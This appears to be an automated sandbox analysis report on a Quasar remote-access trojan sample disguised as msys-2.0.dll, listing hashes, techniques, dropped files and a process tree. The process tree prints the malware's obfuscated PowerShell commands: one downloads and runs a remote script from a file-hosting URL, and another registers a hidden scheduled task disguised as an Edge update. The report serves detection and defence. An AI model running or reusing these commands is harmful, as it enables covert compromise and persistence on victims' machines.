quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
0s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
19/04/2025, 15:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

msys-2.0.dll
Size

88KB
MD5

f947218a2b6bc294c22175030824c12b
SHA1

ba97c647a21d78f4d70135231574a9162998a3bf
SHA256

940d104b54c78abc2ab4af8d88c0da0083dda6ddf63e92976d96fadcf46d35c4
SHA512

46cb9b32a5bc07fb55fded5e42bbc8362ba0106d19c4441a639a821cd612867f676017d525d167384c9595b506db2d7a6f2ac8fa2d2c7fe102ede7b6132cd6e5
SSDEEP

1536:gsssTDMfCgjgibbqJ7tJ2Lr/lWzv0EH80OrxECICtf1eL5eim:hsOo6yOJRJ2X/czv0EH80OrxE9Ctf1eC

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral4/memory/5396-54-0x0000025C88630000-0x0000025C887BE000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2660	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2660	powershell.exe
2660	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeRestorePrivilege	4128	rundll32.exe
Token: SeBackupPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	2660	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4128 wrote to memory of 3044	4128	rundll32.exe	78
PID 4128 wrote to memory of 3044	4128	rundll32.exe	78
PID 3044 wrote to memory of 1640	3044	cmd.exe	80
PID 3044 wrote to memory of 1640	3044	cmd.exe	80
PID 1640 wrote to memory of 4612	1640	winAPI.dll	81
PID 1640 wrote to memory of 4612	1640	winAPI.dll	81
PID 4612 wrote to memory of 1152	4612	cmd.exe	82
PID 4612 wrote to memory of 1152	4612	cmd.exe	82
PID 1152 wrote to memory of 1036	1152	cmd.exe	83
PID 1152 wrote to memory of 1036	1152	cmd.exe	83
PID 1152 wrote to memory of 2660	1152	cmd.exe	84
PID 1152 wrote to memory of 2660	1152	cmd.exe	84

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1036	attrib.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msys-2.0.dll,#1
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Users\Admin\AppData\Local\Temp\winAPI.dll
    winAPI.dll
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4612
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1152
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:1036
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2660
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        
        PID:5156
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        
        PID:5396
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bqiczrww\bqiczrww.cmdline"
        7⤵
        
        PID:5772
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1567.tmp" "c:\Users\Admin\AppData\Local\Temp\bqiczrww\CSCBBC72DE0A7544FC79EF0DCFD1A85A39D.TMP"
        8⤵
        
        PID:2436

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
adecdcb123e974a5590782e6c8961995

SHA1
61e048609ede0601ca11892ad4d7a6f24194e132

SHA256
a3a36352abe201f01069f6266146c9c36153951ded82384ba829b33e08108183

SHA512
81bf8263c460de1b0fc15591bf9b54ae9e4c71af8d6a96056b6ef5877211cad6e4de60698300b89497859215b1cf1ece53681827874eaa48c8e20a738fa2ddfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23dc444af1c77687ac4b9e31e692998b

SHA1
2386191cd501c84d6046215259435c0f863bc498

SHA256
c7c9775b8bc60f57e7e9e66f01b44070d2b8e226b792a6b727e689bddc80bbf8

SHA512
b4ffdcdff4d667f9760f75d750576c4acf7c9e607597ab173dae0e6fc47ce37ef776ddf7af86fcd355765b32710a990c784b2e034e3841b9ca0bf5974272c66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1567.tmp

Filesize
1KB

MD5
e017a542cbdf5fe12e408114b3bc15a6

SHA1
94f121f1696397229c65b495a54a8825c6095de6

SHA256
6dea9c958ec8a8db3529f659e78e069afa9230f59ee2499eab5313c3d1eafec2

SHA512
a3e57b6a89d99abf75a9117acd000d98f9849a3095044b83b3e4068890e8efceeb048196e29e5f30b72e7665550c3a78f50f842db632e15e3fbbc7aba0cec33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixdldae0.yae.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bqiczrww\bqiczrww.dll

Filesize
3KB

MD5
515b082ee7a61fd67057935037989dd2

SHA1
d08928f3581f6cc136d1b8c621a37707ee898a0d

SHA256
36aa97affacc7175cf93a86b1c822664332f25a672c977abe000275aedb5c0b5

SHA512
4ae94fb15bb66d26a51df64b39cf5fcccf345b349dc2e5af463596dfb70f0f9db8e39c675ef60754a4016af394e2050b962976e14d9be08dddf499203d49c477

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bqiczrww\CSCBBC72DE0A7544FC79EF0DCFD1A85A39D.TMP

Filesize
652B

MD5
49ed6cfa61dea5778fbb5fb062dfedce

SHA1
8f049e2a782333562260600b3e84a152466fb6ca

SHA256
28c2d7e3cd38c3793df892f7fca988f4cde77e98054b7014bc6f6eceb77dbd9f

SHA512
da97c453fbefe4b58435312bcea36e35aedbabc886c22fa9cf01722da8d825729f3f59772077d0a63bf7084b478b62db4f3f884ebedfae8446787771a293c3ca

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bqiczrww\bqiczrww.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bqiczrww\bqiczrww.cmdline

Filesize
369B

MD5
5d1ef1071a100a7be731c5a392c7d4e3

SHA1
731b2653f5df91c03649fd3258dd56384d03ff70

SHA256
e808aff1d1f152f9bd9cff9ae2c46f02157d5f3e0bec432e157fa3512806c1cd

SHA512
e1a8a6e38b6940477ccbacf02e3367edf37f4f3f7dc14bd71303ac062b8fd0647f323f082a96deabf4d2e0fda667ab3c737a3bbe48163fa2e95180b59349395f

Download Submit
memory/2660-7-0x0000021141B50000-0x0000021141B72000-memory.dmp

Filesize
136KB

Download
memory/4128-0-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/4128-1-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/5396-54-0x0000025C88630000-0x0000025C887BE000-memory.dmp

Filesize
1.6MB

Download
memory/5396-52-0x0000025C88020000-0x0000025C8818A000-memory.dmp

Filesize
1.4MB

Download
memory/5396-55-0x0000025C884B0000-0x0000025C884CA000-memory.dmp

Filesize
104KB

Download
memory/5396-50-0x0000025C88000000-0x0000025C88008000-memory.dmp

Filesize
32KB

Download
memory/5396-56-0x0000025C88820000-0x0000025C88832000-memory.dmp

Filesize
72KB

Download
memory/5396-59-0x0000025CE5DE0000-0x0000025CE5E92000-memory.dmp

Filesize
712KB

Download
memory/5396-60-0x0000025C88870000-0x0000025C888BE000-memory.dmp

Filesize
312KB

Download
memory/5396-63-0x0000025C88960000-0x0000025C8898A000-memory.dmp

Filesize
168KB

Download
memory/5396-62-0x0000025C88910000-0x0000025C8895A000-memory.dmp

Filesize
296KB

Download
memory/5396-61-0x0000025C888C0000-0x0000025C8890C000-memory.dmp

Filesize
304KB

Download
memory/5396-58-0x0000025CD5C30000-0x0000025CD5C80000-memory.dmp

Filesize
320KB

Download
memory/5396-57-0x0000025C88830000-0x0000025C8886A000-memory.dmp

Filesize
232KB

Download